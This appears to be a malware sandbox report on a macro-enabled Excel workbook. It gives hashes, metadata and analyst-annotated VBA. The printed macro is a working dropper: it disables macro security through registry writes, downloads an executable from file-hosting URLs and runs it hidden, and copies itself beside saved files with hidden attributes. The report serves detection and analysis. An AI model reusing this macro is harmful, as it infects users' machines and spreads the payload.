Malicious
Classifications

-

Threat Names

Mal/HTMLGen-A

File Name Category Type Verdict Actions
C:\Users\RDhJ0CNFevzX\Desktop\habilitado para macro.xlsm Sample File Office File
Malicious
MIME Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 116.71 KB
MD5 3558aa966eb00cfbd3071f868e5afb25
SHA1 64dba1361a188e493205ce894d5494db6d489035
SHA256 acfe38dfd3856d7edda03ab3a3f78e7ad908912b162d6a79507f813d442eaa58
SSDeep 1536:eLEHorDlOhAYiQRshfkp7Vgk5moAVNL9weeSIQT989dhWB99mhLdSwxOTj4vUYtX:vgpy9shfCh5moAPf8xW1UxO3pYwvWNIu
ImpHash -
Office Information
Creator RPC1
Last Modified By Matheus
Create Time 2015-01-15 16:55 (UTC)
Modify Time 2023-09-18 21:42 (UTC)
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Planilhas 9
Titles Of Parts ABS, INDISP, LOGADO, PAUSAS, ADERÊNCIA, Planilha2, TMA, SHORT CALL, NOTA
ScaleCrop False
SharedDoc False
VBA Macros (1)
Macro #1: ThisWorkbook
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module-level state shared by the workbook event handlers below.
' SheetsChanged: set True by the SheetChange/NewSheet/SheetActivate handlers and
'   reset to False at the end of Workbook_Open and Workbook_BeforeSave; read by
'   Workbook_BeforeClose.
' SheetCount: sheet count recorded in Workbook_Open and compared in
'   Workbook_SheetActivate.
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

' Analyst note: Workbook_Open is the Excel event that fires automatically when
' the workbook is opened with macros enabled, so everything in this handler runs
' without further user action. It (1) unhides all sheets, (2) lowers the macro
' security setting for Excel and Word in the current user's registry hive, and
' (3) calls MPS, which locates or downloads an executable and launches it.
Private Sub Workbook_Open()
  Dim i As Integer
  ' Make every sheet visible. Workbook_BeforeSave hides all but the last sheet
  ' before writing the file, so this reverses that state for the current user.
  For i = 1 To ActiveWorkbook.Sheets.Count
    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
  Next i
  
  ' Detection point: VBAWarnings = 1 is the Office "enable all macros" setting.
  ' A write to ...\Office\<version>\{Excel,Word}\Security\VBAWarnings made from
  ' an Office process is a strong indicator; RegKeySave performs it through
  ' WScript.Shell.RegWrite. Remediation should restore these values.
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
  
  ' Suppress Excel prompts for the rest of the session.
  Application.DisplayAlerts = False
  SheetCount = Worksheets.Count
  
  ' Payload stage: see MPS for the file paths, URLs and process launch.
  Call MPS
  
  ActiveWorkbook.Sheets(1).Select
  ' Reset the change flag so the visibility changes above are not counted as
  ' user edits by Workbook_BeforeClose.
  SheetsChanged = False
End Sub

' Analyst note: runs when the workbook is about to close. If none of the
' change-tracking handlers set SheetsChanged, the workbook is marked as already
' saved, which stops Excel from showing its "save changes?" prompt. Presumably
' this hides the fact that Workbook_Open modified sheet visibility - the intent
' is inferred, not stated in the code.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
  If Not SheetsChanged Then
    ActiveWorkbook.Saved = True
  End If
End Sub

' Change tracking: any cell edit on any sheet sets the module-level
' SheetsChanged flag that Workbook_BeforeClose reads.
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
  SheetsChanged = True
End Sub

' Change tracking: adding a sheet sets the module-level SheetsChanged flag that
' Workbook_BeforeClose reads.
Private Sub Workbook_NewSheet(ByVal Sh As Object)
  SheetsChanged = True
End Sub

' Change tracking: on each sheet activation, compares the current sheet count
' with the count recorded earlier. A difference is treated as a user change
' (sets SheetsChanged) and the recorded count is refreshed.
Private Sub Workbook_SheetActivate(ByVal Sh As Object)
  If ActiveWorkbook.Sheets.Count <> SheetCount Then
    SheetsChanged = True
    SheetCount = ActiveWorkbook.Sheets.Count
  End If
End Sub

' Analyst note: intercepts every save. In both branches the built-in save is
' cancelled (Cancel = True) and replaced by the macro's own save, performed
' while all sheets except the last one are hidden; the sheets are made visible
' again afterwards. The file written to disk therefore opens showing only the
' last sheet until Workbook_Open runs. Likely that last sheet is what a
' recipient sees while macros are still disabled - TODO confirm by inspecting
' the sheet content, which is not part of this listing.
'
' SaveAsUI = False : plain Save, written in place.
' SaveAsUI = True  : Save As. The macro shows its own file dialog, forces the
'                    macro-enabled .xlsm format and then calls SaveAsInj to place
'                    a copy of the executable next to the saved workbook.
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
  Dim i As Integer
  Dim AIndex As Integer
  Dim FName

  ' Remember the active sheet so the selection can be restored after saving.
  AIndex = ActiveWorkbook.ActiveSheet.Index

  If SaveAsUI = False Then
    Cancel = True
    ' Events are disabled so the ActiveWorkbook.Save below does not re-enter
    ' this handler; screen updating is off so the hide/unhide is not shown.
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    ' Hide sheets 1..Count-1, leaving only the last sheet visible in the file.
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    ActiveWorkbook.Save
      
    ' Restore the view for the current user.
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
    
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  Else
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    
    ' NOTE(review): the filter label looks like Turkish text ("Excel workbook")
    ' decoded with the wrong code page - an artefact of the author's locale or of
    ' extraction; not confirmable from this listing. Only *.xlsm is offered.
    FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalýþma Kitabý (*.xlsm), *.xlsm")
    If FName <> False Then
      ' The copy is always written macro-enabled, so the macro travels with it.
      ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
      ' Detection point: a hidden "~$cache1" file may appear in the destination
      ' folder right after this save (see SaveAsInj).
      SaveAsInj ActiveWorkbook.Path
    End If
    
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
        
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  End If
End Sub

' Analyst note: called from the Save As branch of Workbook_BeforeSave with the
' folder the workbook was just saved to. If %ALLUSERSPROFILE%\Synaptics\Synaptics.exe
' exists on this machine, it is copied into that folder as "~$cache1" (no
' extension) and the copy is marked Hidden + System. MPS looks for this same
' file name next to the workbook when the document is opened.
'
' Hunting/IR: search shares and removable media for files named "~$cache1" with
' Hidden+System attributes located beside .xlsm files. The "~$" prefix resembles
' the naming of Office owner/lock files, so the name alone is easy to overlook.
Sub SaveAsInj(DIR As String)
  Dim FSO As Object
  Dim FN As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  ' Source executable; its presence is the only precondition checked here.
  FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
  
  If FSO.FileExists(FN) Then
    ' Copy only if the target folder does not already contain one.
    If Not FSO.FileExists(DIR & "\~$cache1") Then
      FileCopy FN, DIR & "\~$cache1"
    End If
    ' Hidden + System keeps the file out of default Explorer listings.
    SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
  End If
End Sub

' Reads a registry value through WScript.Shell.RegRead and returns it as a
' String. Errors are suppressed with On Error Resume Next, so a missing key
' leaves the return value at its default. Not called anywhere else in this
' listing.
Function RegKeyRead(i_RegKey As String) As String
  Dim myWS As Object

  On Error Resume Next
  Set myWS = CreateObject("WScript.Shell")
  RegKeyRead = myWS.RegRead(i_RegKey)
End Function

' Returns True if WScript.Shell.RegRead succeeds for the given key, False if the
' read raises an error. Not called anywhere else in this listing.
Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object

  On Error GoTo ErrorHandler
  Set myWS = CreateObject("WScript.Shell")
  myWS.RegRead i_RegKey
  RegKeyExists = True
  Exit Function
  
ErrorHandler:
  RegKeyExists = False
End Function

' Writes a registry value through WScript.Shell.RegWrite. i_Type defaults to
' "REG_SZ". In this listing it is called only from Workbook_Open, to set the
' Excel and Word VBAWarnings values.
' Detection point: the write goes through the WScript.Shell COM object created
' inside the Office process; no separate registry tool is started by this code,
' so registry-write telemetry attributed to the Office process is the place to
' look.
Sub RegKeySave(i_RegKey As String, _
               i_Value As String, _
      Optional i_Type As String = "REG_SZ")
Dim myWS As Object

  Set myWS = CreateObject("WScript.Shell")
  myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

' Analyst note: payload stage, called from Workbook_Open. It looks for an
' executable in a fixed order and starts the first one found with a hidden
' window (Shell ..., vbHide):
'   1. "~$cache1" next to the workbook  -> copied to %TEMP%\~$cache1.exe, run
'   2. "Synaptics.exe" next to the workbook -> copied to %TEMP%\~$cache1.exe, run
'   3. %ALLUSERSPROFILE%\Synaptics\Synaptics.exe -> run in place
'   4. %WINDIR%\System32\Synaptics\Synaptics.exe -> run in place
'   5. otherwise, if %TEMP%\~$cache1.exe is absent, try the download URLs via
'      FDW and run the result if a file was written
'   6. otherwise run the existing %TEMP%\~$cache1.exe
'
' Indicators visible in this procedure (for detection and blocking):
'   - file paths: <workbook dir>\~$cache1, <workbook dir>\Synaptics.exe,
'     %TEMP%\~$cache1.exe, %ALLUSERSPROFILE%\Synaptics\Synaptics.exe,
'     %WINDIR%\System32\Synaptics\Synaptics.exe
'   - the three URL() values below (URL(2) and URL(3) are identical)
'   - an Office process starting a child process from one of the paths above
Sub MPS()
  Dim FSO As Object
  ' FP(3) is declared but never assigned in this procedure.
  Dim FP(1 To 3), TMP, URL(1 To 3) As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  ' Candidate copies stored beside the document (see SaveAsInj for "~$cache1").
  FP(1) = ActiveWorkbook.Path & "\~$cache1"
  FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

  ' Download locations on public file-hosting services, tried in order.
  URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  ' Staging path used for every copied or downloaded executable.
  TMP = Environ("Temp") & "\~$cache1.exe"
  
  If FSO.FileExists(FP(1)) Then
    ' An existing staged file is reused, not overwritten.
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(1), TMP
    End If
    Shell TMP, vbHide
  ElseIf FSO.FileExists(FP(2)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(2), TMP
    End If
    Shell TMP, vbHide
  Else
    ' No copy beside the document: fall back to copies already on the machine.
    If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
      Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
    ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
      Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
    ElseIf Not FSO.FileExists(TMP) Then
      ' The empty If/ElseIf chain only sequences the attempts: each FDW call is
      ' made only if the previous one returned False.
      If FDW((URL(1)), (TMP)) Then
      ElseIf FDW((URL(2)), (TMP)) Then
      ElseIf FDW((URL(3)), (TMP)) Then
      End If
      ' Run only if a file was actually written by one of the attempts.
      If FSO.FileExists(TMP) Then
        Shell TMP, vbHide
      End If
    Else
      Shell TMP, vbHide
    End If
    
  End If
  
End Sub

' Analyst note: download helper used by MPS. Issues a synchronous HTTP GET for
' MYU through the WinHttp.WinHttpRequest COM object and, if the response is
' accepted, writes the raw response body to the path NMA through ADODB.Stream.
' Returns True when a body was written, False otherwise.
'
' The response is accepted when the status is 200 and the text contains none of
' three error-page markers. No check of the content type or file format is
' visible, so any other 200 response is saved. The report this listing comes
' from lists two downloaded files of type text/html, which may be what these
' requests returned in that run - not confirmable from the listing alone.
'
' Network indicators: the fixed User-Agent string set below, sent by an Office
' process to the hosts named in MPS.
Function FDW(MYU, NMA As String) As Boolean
  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
  If WinHttpReq Is Nothing Then
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
  End If

  ' Option(0) is the WinHTTP user-agent string option.
  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
  ' Option(6) is the WinHTTP redirect option. NOTE(review): AllowRedirects is
  ' not declared or assigned anywhere in this listing.
  WinHttpReq.Option(6) = AllowRedirects
  ' Third argument False = synchronous request.
  WinHttpReq.Open "GET", MYU, False
  WinHttpReq.Send
  
  If (WinHttpReq.Status = 200) Then
    ' Reject responses that look like hosting-service error pages.
    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
      FDW = True
      ' ADODB.Stream with Type = 1 (binary) writes the body byte-for-byte.
      Set oStream = CreateObject("ADODB.Stream")
      oStream.Open
      oStream.Type = 1
      oStream.Write WinHttpReq.ResponseBody
      oStream.SaveToFile (NMA)
      oStream.Close
    Else
       FDW = False
    End If
  Else
    FDW = False
  End If
End Function

Extracted URLs (2)
URL WHOIS Data Reputation Status Recursively Submitted Actions
Malicious
Malicious
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso4a31.tmp Dropped File Image
Clean
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso4a41.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso549.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso6f0.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso6f1.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso7dc.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso7dd.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso89a.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso89b.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso986.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso987.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoa63.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoa64.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoc88.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoc89.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoe20.tmp (Dropped File)
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\msoe21.tmp (Dropped File)
MIME Type image/png
File Size 5.34 KB
MD5 c4c38a7d937c652fe5c5a39c668f8d86
SHA1 baacab0836afc11765e1896388d06f7a5deb9253
SHA256 48b090cbfa1300a7a60f6eaafa08ddaccfc96943c8a3e943a4b9d9e45a18b52a
SSDeep 24:Lc8/6BJvNMOOEqeeenkOEEBeeennMREieeeenMGeeennMMOEEieeennMMpPWeeer:Lv/6BH
ImpHash -
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\mso4ea.tmp Dropped File Empty
Clean
MIME Type application/x-empty
File Size 0 Bytes (not extracted)
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -
3212aadb6d3a1789c1b9957ce3473863c8ffc425b6706384119568c165d73f34 Downloaded File HTML
Clean
MIME Type text/html
File Size 1.60 KB
MD5 74211d69292aeb3622f0d0c45d16da5d
SHA1 e339693ecba6def870ec48005c0963ad6ae4a999
SHA256 3212aadb6d3a1789c1b9957ce3473863c8ffc425b6706384119568c165d73f34
SSDeep 24:bsF+0r/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+A+pAZewRDK4mW
ImpHash -
a9a292cabe24873cac1e508e576b71f49ddb3a36c1fe27cafffb0e054692f453 Downloaded File HTML
Clean
MIME Type text/html
File Size 1.09 KB
MD5 79ace10b664dfa27609ea64d53e7332d
SHA1 4b51414552b0bb3bdae345054bb53bd4e1e2cbf5
SHA256 a9a292cabe24873cac1e508e576b71f49ddb3a36c1fe27cafffb0e054692f453
SSDeep 24:hYjkspFAuWGDg5+DCpdgcPn8KvGATBddslZ2jfZc2v2Mq25uXc:4plWFlzuAlHAZexcA4lc
ImpHash -